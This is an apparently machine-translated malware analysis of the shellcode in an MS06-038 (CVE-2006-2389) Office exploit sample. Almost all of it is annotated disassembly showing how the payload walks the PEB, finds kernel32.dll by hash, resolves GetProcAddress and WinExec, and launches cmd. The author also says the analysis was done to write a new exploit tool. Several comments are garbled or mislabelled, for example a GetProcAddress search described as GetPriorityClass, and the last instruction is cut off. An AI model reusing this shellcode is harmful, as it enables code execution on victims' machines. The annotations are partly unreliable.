Shellcode in reverse MS06-038 sample

Microsoft Office Property Code Execution exploi Vulnerability No.: CVE-2006-2389. On September, sebug saw its sample, analyzed it, and wanted to write a new exploit tool for this vulnerability, now we will disassemble and explain the sample shellcode.
0830674C fc cld // DF reset, that is, DF = 0
0830674D 33D2 xor edx and EDX are cleared
0830674F B2 30 mov dl, 30 // dl = 30
08306751 64: FF32 push dword ptr fs: [EDX] // find PEB and press it into Stack
08306754 5A pop edx // assigned to EDX
08306755 8B52 0C mov edx, dword ptr ds: [EDX + C] // find PEB_LDR_DATA
08306758 8B52 14 mov edx, dword ptr ds: [EDX + 14] // for this special point, go to InMemoryOrderModuleList.
0830675B 8B72 28 mov esi, dword ptr ds: [EDX + 28] // find the BaseDllName of the LDR_MODULE structure. It is actually the name of the current process. I have tried it!
0830675E 33C9 xor ecx, ECX // ecx = 0
08306760 B1 18 mov cl, 18 // counter bar, WINWORD. EXE, plus the length of the terminator 12*2
08306762 33FF xor edi, EDI // edi
08306764 33C0 xor eax, EAX // eax
08306766 ac lods byte ptr ds: [ESI] // transfers the memory data pointed to by ds: [esi] To eax, one character at a time
08306767 3C 61 cmp al, 61 // all uppercase letters smaller than a ASSCII = 61
08306769 7C 02 jl short 0830676D // skip to 0830676D if the value is smaller
0830676B 2C 20 sub al, 20 // converts it to lowercase letters if it is not smaller
0830676D C1CF 0D ror edi, 0D // shift right of 0d cyclically
08306770 03F8 add edi, EAX // ADD the shift result to eax
08306772 ^ E2 F0 loopd short 08306764 // process cyclically until the complete process name is processed
08306774 81FF 5BBC4A6A cmp edi, 6A4ABC5B // determine whether kernel32.dll processes the obtained data
0830677A 8B5A 10 mov ebx, dword ptr ds: [EDX + 10] // view the next module
0830677D 8B12 mov edx, dword ptr ds: [EDX]
0830677F ^ 75 da jnz short 0830675B // if it is not 6A4ABC5B, It is redirected. If it is, kernel32.dll is found.
08306781 8B53 3C mov edx, dword ptr ds: [EBX + 3C] // locate the address of kernel32.dll and locate the api address
08306784 03D3 add edx, EBX // find the PE, and start searching for the API below
08306786 FF72 34 push dword ptr ds: [EDX + 34]
08306789 8B52 78 mov edx, dword ptr ds: [EDX + 78]
0830678C 03D3 add edx, EBX
0830678E 8B72 20 mov esi, dword ptr ds: [EDX + 20]
08306791 03F3 add esi, EBX
08306793 33C9 xor ecx, ECX
08306795 41 INC ECX
08306796 ad lods dword ptr ds: [ESI]
08306797 03C3 add eax, EBX
08306799 8138 47657450 cmp dword ptr ds: [EAX], 50746547 // search API function GetPriorityClass
0830679F ^ 75 F4 jnz short 08306795
083067A1 8178 04 2017f634> cmp dword ptr ds: [EAX + 4], 41636F72
083067A8 ^ 75 eb jnz short 08306795
083067AA 8178 08 6464726> cmp dword ptr ds: [EAX + 8], 65726464 // GetProcAddress
083067B1 ^ 75 E2 jnz short 08306795
083067B3 49 DEC ECX
083067B4 8B72 24 mov esi, dword ptr ds: [EDX + 24]
083067B7 03F3 add esi, EBX
083067B9 66: 8B0C4E mov cx, word ptr ds: [ESI + ECX * 2]
083067BD 8B72 1C mov esi, dword ptr ds: [EDX + 1C]
083067C0 03F3 add esi, EBX
083067C2 8B148E mov edx, dword ptr ds: [ESI + ECX * 4]
083067C5 03D3 add edx, EBX
083067C7 52 PUSH EDX
083067C8 68 78656301 PUSH 1636578
083067CD FE4C24 03 dec byte ptr ss: [ESP + 3]
083067D1 68 57696E45 PUSH 456E6957 // WinExec
083067D6 54 PUSH ESP
083067D7 53 PUSH EBX
083067D8 FFD2 call edx // CALL GetProcAddress to obtain the WinExec address.
083067DA 68 636D6401 PUSH 1646D63 // 646d63 = cmd
083067DF FE4C24 03 dec byte ptr ss: [ESP + 3] // 01-1 in 01646D63, 646D63 = cmd is left.
083067E3 6A 05 PUSH 5 // second parameter SW_SHOW
083067E5 33C9 xor ecx, ECX // reset, used to save Parameters
083067E7 8D4C24 04 lea ecx, dword ptr ss: [ESP + 4] // get the cmd offset address
083067EB 51 push ecx // press the first parameter cmd
083067EC FFD0 CALL EA